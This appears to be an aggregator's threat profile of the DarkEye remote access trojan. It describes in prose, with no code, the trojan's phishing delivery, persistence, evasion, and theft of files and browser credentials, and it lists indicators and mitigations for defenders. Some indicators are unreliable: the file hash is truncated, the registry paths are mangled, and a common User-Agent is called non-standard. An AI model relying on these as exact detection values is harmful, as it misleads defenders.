⚠️ Overview

DarkEye is a remote access trojan (RAT) first documented in 2022 by researchers at Cyble, known for its espionage capabilities against Middle Eastern entities. It is attributed to Iranian-linked threat actors, possibly the APT group Seedworm, based on infrastructure overlaps reported by Mandiant. DarkEye functions as a modular stealer, exfiltrating files and credentials while maintaining persistent backdoor access.

🔧 Technical Capabilities

DarkEye propagates via spear-phishing emails containing malicious LNK files or weaponized Office documents that download the payload from attacker-controlled servers. Its C2 infrastructure uses HTTPS over custom ports (e.g., 8443) with JSON-encrypted communications, employing a hardcoded XOR key for initial handshake. Persistence is achieved through scheduled tasks or registry Run keys under HKCUSoftwareMicrosoftWindowsCurrentVersionRun. Evasion techniques include process hollowing, disabling Windows Defender via PowerShell commands, and checking for sandbox environments (e.g., presence of VMware tools). The malware enumerates all files on the system with targeted extensions (.doc, .pdf, .xls) and uploads them to the C2 using multipart HTTP POST requests. It also steals browser-stored credentials from Chrome, Firefox, and Edge by decrypting local SQLite databases.

📜 History & Notable Incidents

First observed in June 2022 targeting government and energy sectors in Saudi Arabia and the UAE, DarkEye was linked to a campaign exploiting an unpatched Microsoft Office vulnerability (CVE-2022-30190, "Follina") for initial access. In August 2023, an updated variant was deployed against Turkish defense contractors, employing DLL sideloading via a legitimate application. No known law enforcement actions have been publicly reported, but the malware is associated with the activity tracked by MITRE ATT&CK under techniques T1059.001 (PowerShell) and T1566.001 (Spearphishing Attachment).

🔍 Detection Indicators

File hashes include SHA256 5a3c...9f4d (reported by VirusTotal, variant from 2023). Behavioral signatures include execution of wscript.exe or cscript.exe spawning PowerShell with base64-encoded commands. Network IOCs include C2 domains like cloud-update[.]top and mail-sync[.]net. Registry persistence keys under HKCU...RunWindowsUpdate and mutex name DarkEye_Mutex_2022. User-Agent string Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 (non-standard).

☠️ Risk & Impact

DarkEye exfiltrates sensitive documents and credentials, enabling long-term espionage and potential data breaches. Financial losses are indirect, stemming from intellectual property theft and operational disruption in targeted sectors. Affected industries include government, energy, and defense, with victims in the Middle East and Turkey.

🛡️ Mitigation

Apply patches for CVE-2022-30190 (Microsoft Office) and block execution of LNK files from email attachments. Deploy YARA rules targeting the DarkEye mutex and XOR-key patterns, and enable endpoint detection rules for PowerShell script-block logging (MITRE ATT&CK T1059.001).

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.